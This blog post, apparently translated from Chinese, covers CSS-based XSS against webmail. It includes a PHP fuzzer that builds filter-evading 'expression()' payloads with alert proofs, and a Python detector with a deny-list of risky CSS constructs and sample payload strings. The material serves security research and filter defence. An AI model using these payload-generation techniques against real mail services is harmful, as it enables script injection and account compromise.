Since the concept of web security was born, attacks have trended toward the ever more devious and intricate; the path from CSRF to today's clickjacking proves it. Clickjacking is really just a trivial application of CSS overlays. It is a technique that skilled web designers would normally use, but once security people applied their devious thinking to it, the now-famous clickjacking was born.
There has been some discussion, at home and abroad, of the security issues that CSS brings. For details, see the talk that David Lindsay, Gareth Heyes and Eduardo Vela Nava [sdc] gave at BlueHat 8:
http://www.thespanner.co.uk/wp-content/uploads/2008/10/the_sexy_assassin2ppt.zip
The exploits from the slides are at http://p42.us/css/, and the blogs of sdc and Gareth Heyes have related write-ups:
http://sirdarckcat.blogspot.com/2008/10/about-css-attacks.html
http://www.thespanner.co.uk/2008/10/20/bluehat/
I think research on CSS in China goes deeper than abroad, because of the involvement of *A. The XSS bugs in Hotmail and Yahoo mail centre on expression in CSS, mainly because IE6 and IE7 support expression well; for FF2, -moz-binding can be used to achieve XSS from CSS. XSS in the style tag [CSS] is therefore still the main avenue for finding webmail XSS.
If you have analysed the published PoCs for Yahoo and others, you will have noticed that the code looks strange. I think it was probably arrived at through a lot of testing and fuzzing, so I followed suit and wrote a simple script [it is too simple, so I didn't find anything :(].
<?php
// Xss fuzzing
// www.80vul.com
// Some from Gareth Heyes's codz :) thx
$string = "expression";
$strinj = "/* google */";
// $strinj = str_replace('/', stringToHexString('/', 'dec'), $strinj);
// Replace the "*" of the opening "/*" with its character reference
$strinj = str_replace('/*', '/' . stringToHexString('*', 'dec'), $strinj);
// $strinj = stringToHexString("/*} */", 'dec');
$arr = array();
$stringarr = array();
// Insert the comment at every offset of the keyword
for ($i = 0, $len = strlen($string); $i < $len; $i++)
{
    $stringarr[$i] = substr($string, $i, 1);
    $destring = substr($string, 0, $i) . $strinj . substr($string, $i, strlen($string));
    // print $destring . "<br>";
    array_push($arr, $destring);
}
// Last variant: the comment between every pair of characters
array_push($arr, implode($strinj, $stringarr));
// print_r($arr);
// print implode($strinj, $stringarr);
foreach ($arr as $i => $value) {
    // print($arr[$i] . "<br>");
    // $xss = '<span style="width:' . $arr[$i] . '(alert(' . $i . '));">Hello' . $i . '</span>';
    // $xss = '<div id="yiv277018259"><div style="width:' . $arr[$i] . '(alert(' . $i . '));"></div>';
    $xss = 'hihihihihihi<style>div{background-image:' . $arr[$i] . '(alert(' . $i . '));}</style>';
    // Append each test case to the log file
    $file = fopen("xsslog.txt", "a+");
    fputs($file, "$xss");
    fclose($file);
}
// Encode every character of $str as an HTML numeric character reference
function stringToHexString($str, $type) {
    $tmp = '';
    // $rand = rand(1, 100);
    for ($i = 0, $len = strlen($str); $i < $len; $i++)
    {
        $ord = ord($str[$i]);
        if ($type == 'dec') { $tmp .= "&#x00" . base_convert($ord, 10, 16) . ";"; }
        if ($type == 'hex') { $tmp .= "&#x" . base_convert($ord, 10, 16) . ";"; }
    }
    return $tmp;
}
?>
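Seen from the mail filter's side, the variants this script writes defeat a plain substring check for "expression(", so a filter has to normalize the CSS before matching. The sketch below is an added example, not code from the original post; the function names and sample strings are constructed for illustration.

```python
import html
import re

# Script-capable CSS constructs named in the post (IE6/IE7 and FF2).
RISKY = ("expression(", "-moz-binding")

# A comment, or an unterminated one that swallows the rest of the sheet.
_COMMENT = re.compile(r"/\*.*?(?:\*/|\Z)", re.S)
# CSS escapes: backslash + 1-6 hex digits (+ optional space), or backslash + char.
_CSS_ESCAPE = re.compile(r"\\(?:([0-9a-fA-F]{1,6})\s?|(.))", re.S)


def _unescape_css(m):
    if m.group(2) is not None:              # \p -> p
        return m.group(2)
    cp = int(m.group(1), 16)                # \69 -> i
    return chr(cp) if 0 < cp <= 0x10FFFF else "\ufffd"


def normalize_css(css):
    """Reduce CSS text to roughly what a lenient browser parser acts on."""
    css = html.unescape(css)                # &#x002a; -> * (style="" values are entity-decoded)
    css = _COMMENT.sub("", css)             # expr/* x */ession -> expression
    css = _CSS_ESCAPE.sub(_unescape_css, css)
    css = re.sub(r"[\x00-\x20]+", "", css)  # drop whitespace and control bytes
    return css.lower()


def risky_constructs(css):
    """Return the RISKY tokens present after normalization."""
    norm = normalize_css(css)
    return [token for token in RISKY if token in norm]


# Constructed samples in the shape of the fuzzer's log entries.
SAMPLES = [
    "div{background-image:expr/* google */ession(alert(1));}",
    "width:e/&#x002a; google */xpression(alert(2));",
    "body{-moz-b\\69nding:url(x.xml#a)}",
    "/* expression( */ p{color:#eee;background:url(bg.png)}",  # benign
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(risky_constructs(sample), "<-", sample)
```

A deny-list like this is useful for detection and log triage; for sanitizing mail HTML, parsing the CSS and allowing only known-safe properties and values is the more robust design.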
A few more CSS-related links:
http://nb.io/hacks/csshttprequest/
http://hi.baidu.com/ycosxhack/blog/item/62ad7c082e74f3930b7b8242.html
From: http://hi.baidu.com/hi_heige/blog/item/aff71d25097f2c35c9955940.html